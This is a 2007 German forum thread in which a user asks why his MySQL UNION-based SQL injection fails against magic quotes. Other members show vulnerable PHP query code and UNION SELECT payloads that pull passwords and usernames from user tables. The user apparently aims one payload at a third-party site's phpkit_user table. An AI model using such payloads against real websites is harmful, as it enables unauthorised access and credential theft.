Hackerboard Wiki HaboBlog
Hackerboard bei Facebook Hackerboard bei Google+ Hackerboard bei Twitter

[HaBo]

 
Webmaster-Security Fragen zur richtigen Serverkonfiguration oder Absicherung dynamischer Scripte gehören hier hinein.

MYSQL Injection, was mach ich falsch.

Diskussion: MYSQL Injection, was mach ich falsch. im Forum Webmaster-Security, in der Kategorie Security Area; Anzeige Code: mysql_query("SELECT irgendwas1,irgendwas2 FROM tabelle WHERE irgendwas=$_GET['sqlinj']"); Injection mittels: Code: seite.php?sqlinj=bla UNION SELECT .... Informier dich einfach mal darüber, ...

Antwort
Alt 27.06.07, 20:27   #16 (permalink)
fetzer
Guest
 
Likes:
Standard

Anzeige

Code:
mysql_query("SELECT irgendwas1,irgendwas2 FROM tabelle WHERE irgendwas=$_GET['sqlinj']");
Injection mittels:
Code:
seite.php?sqlinj=bla UNION SELECT ....
Informier dich einfach mal darüber, was Magic Quotes überhaupt macht und du wirst auch wissen, was zu tuhen ist
  Mit Zitat antworten
Alt 27.06.07, 21:03   #17 (permalink)
Themenstarter
 
Registriert seit: 26.06.07
IRoot Leistung: Facit NTK
Likes: 0
Standard

Zitat:
Original von fetzer
Code:
mysql_query("SELECT irgendwas1,irgendwas2 FROM tabelle WHERE irgendwas=$_GET['sqlinj']");
Injection mittels:
Code:
seite.php?sqlinj=bla UNION SELECT ....
Informier dich einfach mal darüber, was Magic Quotes überhaupt macht und du wirst auch wissen, was zu tuhen ist
Hää, das ist doch das Selbe wie dass, und das funktioniert nicht

Code:
http://x.x.funpic.de/comments.php?comment=news&id=38 UNION SELECT password,benutzername FROM users--
Gruss IRoot

Edit: Hier noch die Phpinfo von Funpic: http://phpinfo.ph.funpic.de/.
Ist Funpic der Spassverderber, oder ICH ?
IRoot ist offline   Mit Zitat antworten
Alt 27.06.07, 21:38   #18 (permalink)
Moderator
 
Benutzerbild von Elderan
 
Registriert seit: 30.03.04
Elderan Leistung: 8086
Likes: 14
Standard

Hallo,
äh du

Wie gesagt, 2 hours of try and error can save 10 minutes auf manual reading...
Elderan ist offline   Mit Zitat antworten
Alt 27.06.07, 21:54   #19 (permalink)
Themenstarter
 
Registriert seit: 26.06.07
IRoot Leistung: Facit NTK
Likes: 0
Standard

Klar, ich weiss Magic Quotes macht einen Slash vor diese zeichen (') (").

Aber, wie müsst ich die Injection machen, um MAGIC Quotes unnnütz zu machen.
Googel hat nichts interessantes dazu ausgespuckt. Sehr wahrscheinlich hab ich nach dem falschen Gegoogelt

Kannst du mir vieleicht einen Guten Tipp geben wie es funktionieren würde?

Funpic hat tatsächlich Magic Quotes ON

Gruss IRoot
IRoot ist offline   Mit Zitat antworten
Alt 27.06.07, 21:56   #20 (permalink)
 
Registriert seit: 23.05.05
Xalon Leistung: Facit NTK
Xalon eine Nachricht über ICQ schicken
Likes: 0
Standard

Das kannst du nicht umgehen
Außer der Querie schaut so aus:

SELECT name FROM user WHERE id=$id

Dann kannst ohne ' ausbrechen

mfg,
Xalon
Xalon ist offline   Mit Zitat antworten
Alt 27.06.07, 22:13   #21 (permalink)
Themenstarter
 
Registriert seit: 26.06.07
IRoot Leistung: Facit NTK
Likes: 0
Standard

Cool, ich hab die Sicherheitslücke Extra noch in meinen PHP Code eingebaut.
Jetzt Funktionier es, aber wie kann ich mir die Daten von dem UNION SELECT ausgeben lassen? Weil das normale Script verarbeitet die UNION daten logischerweise nicht. :

Gruss IRoot
IRoot ist offline   Mit Zitat antworten
Alt 28.06.07, 14:34   #22 (permalink)
 
Registriert seit: 23.05.05
Xalon Leistung: Facit NTK
Xalon eine Nachricht über ICQ schicken
Likes: 0
Standard

Klar tut es des:

Code:
$id = -1 UNION SELECT pwd FROM users WHERE id=1
SELECT name FROM users WHERE id=$id

mfg,
Xalon
Xalon ist offline   Mit Zitat antworten
Alt 29.06.07, 18:38   #23 (permalink)
Themenstarter
 
Registriert seit: 26.06.07
IRoot Leistung: Facit NTK
Likes: 0
Standard

Zitat:
Original von Xalon
Klar tut es des:

Code:
$id = -1 UNION SELECT pwd FROM users WHERE id=1
SELECT name FROM users WHERE id=$id

mfg,
Xalon
Funktionier aber nur Bei dieser Webside bei einer Anderen mit anderem Quelltext, werden die Resultate nicht ausgespuckt

Hier die Injection:
?kategorie=-1+UNION+SELECT+user_name+FROM+phpkit_user+WHERE+us er_id=1

Gibt es nicht ein Programm, das Quellcode unabhänig die Daten ausgeben kann?

Gruss IRoot
IRoot ist offline   Mit Zitat antworten
Alt 29.06.07, 21:21   #24 (permalink)
fetzer
Guest
 
Likes:
Standard

Du verstehst da was falsch: Solch eine Injection funktioniert nicht überall, viele haben sich dagegen geschützt, vor allem "berühmte" Skripte ala PHPKit.
Nebenbei hast du dir weder die Seiten zu UNION (ALL) durchgelesen, noch hast du dich irgendwie damit beschäftigt.
  Mit Zitat antworten
Alt 29.06.07, 21:40   #25 (permalink)
Themenstarter
 
Registriert seit: 26.06.07
IRoot Leistung: Facit NTK
Likes: 0
Standard

Klar, ich weiss aber dass, es auf der Webside Funktioniert. Nur ist das Script nicht dazu gedacht, daten auszugeben. Aber MYSQL Code kann ich ohne probleme einfügen, nur ich bekomm dann meinen SELECT nicht angezeit :

Der Fehler liegt nich an PHPKit, sondern an einer .php Datei die nicht zu PHPKit gehört. Soweit hab ich mich schon informiert.

Ich möchte halt einfach das von meiner SELECT Abfrage auch angezeigt bekommen :
IRoot ist offline   Mit Zitat antworten
Antwort
   
- Anzeige -

Werbung ist gerade online    

[HaBo] » Security Area » Webmaster-Security » MYSQL Injection, was mach ich falsch.
Themen-Optionen
Ansicht

Forumregeln
Es ist Ihnen nicht erlaubt, neue Themen zu verfassen.
Es ist Ihnen nicht erlaubt, auf Beiträge zu antworten.
Es ist Ihnen nicht erlaubt, Anhänge hochzuladen.
Es ist Ihnen nicht erlaubt, Ihre Beiträge zu bearbeiten.

BB-Code ist an.
Smileys sind an.
[IMG] Code ist an.
HTML-Code ist aus.
Trackbacks sind aus
Pingbacks sind aus
Refbacks sind aus


Ähnliche Themen
Thema Autor Forum Antworten Letzter Beitrag
UMTS Stick - simlock - oder mach ich was falsch? nonpretium Internet Allgemein 1 23.09.09 18:25
Squid schaltet ab, wenn dante startet was mach ich falsch? Wasserratte Linux/UNIX 2 25.01.08 23:00
Programmieren anfänger was mach ich falsch? onix Code Kitchen 6 15.06.07 13:47
Was mach ich falsch ? Chrizlybaer Code Kitchen 5 03.01.06 15:35
Was mach ich Falsch ? Turbo C Bogus Code Kitchen 1 10.08.05 23:08


1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61